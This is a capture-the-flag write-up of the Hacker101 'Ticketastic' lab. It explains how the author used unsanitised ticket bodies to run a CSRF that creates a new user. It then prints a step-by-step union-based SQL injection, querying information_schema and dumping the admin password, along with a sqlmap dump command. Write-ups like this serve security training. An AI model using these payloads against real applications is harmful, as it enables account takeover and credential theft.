CTF — Hacker101 — Ticketastic

This one was pretty fun and straightforward CTF, I enjoyed it a lot.

So without further talks, let's jump into it.

FLAG0

From playing with the demo instance, I realized that after logging as admin (with admin/admin) and trying to add new user, the credentials of the new user passes via a GET request, in the URL.

It looked something like this:

GET to xxxxx/yyyyy/newUser?username=user&password=pass&password2=pass

Well, that's a really bad practice of passing credentials, but we need more than that to gain the flag here.

Trying to submit a ticket, I found that there was a room for XSS, HTML injections and whatnot. The payload executed after logging in.

The problem is that is contrary to the demo mode, where we could log in with admin/admin and add new users as much as we wanted, in the live case we don't know the password for admin, so we cannot log in nither add new users.

So we need to figure out how to log in without the admin password.

Knowing that there was no sanitation at all in the body when submitting a new ticket, I tried to inject a malicious link and see what happens.

A Succesful injection

So if there is no sanitation at all, and I can inject just any link I want, we can use here CSRF! let's try to add a new user.

PoC

After the request was made by us, we need to log in with the new credentials for the user we just added with CSRF, in this case, user1 & password1.

Trying to log on and YES! I'm in and see all the tickets that were submitted including the ticket “Flag Won’t Work” in which we can find our first flag.

FLAG1

So for this flag, I tried to fool around a bit, when finding out the ‘id’ parameter at “ticket?id=x” is injectable to SQLi.

We need to find the admin’s password, and we can do it in 2 different ways, the manual way, or the automated way.

1. Manual SQL injection

Testing TRUE vs FALSE queries:

ticket?id=1 AND 1=1
ticket?id=1 AND 1=2

Finding out the numbers of fields in the table:
ticket?id=1 AND 1=1 ORDER BY 3

ticket?id=1.1 UNION SELECT 1,2,3 —

Finding the table name:

ticket?id=1.1 UNION SELECT 1,GROUP_CONCAT(TABLE_NAME),3 FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA=DATABASE() —

Found ‘users’, finding columns:

ticket?id=1.1 UNION SELECT 1,GROUP_CONCAT(COLUMN_NAME),3 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA=DATABASE() AND TABLE_NAME=’users’ —

And at the end, finding the password for ‘admin’:

ticket?id=1.1 UNION SELECT 1,password,3 FROM users WHERE username=’admin’ —

2. Automating the process — using SQLMap

Gathering the GET request from Burp into a txt file (in this case sqlr.txt).

Then, using SQLMap: sqlmap -r sqlr.txt — dump.

And WALLA! 5 min later, getting the flag.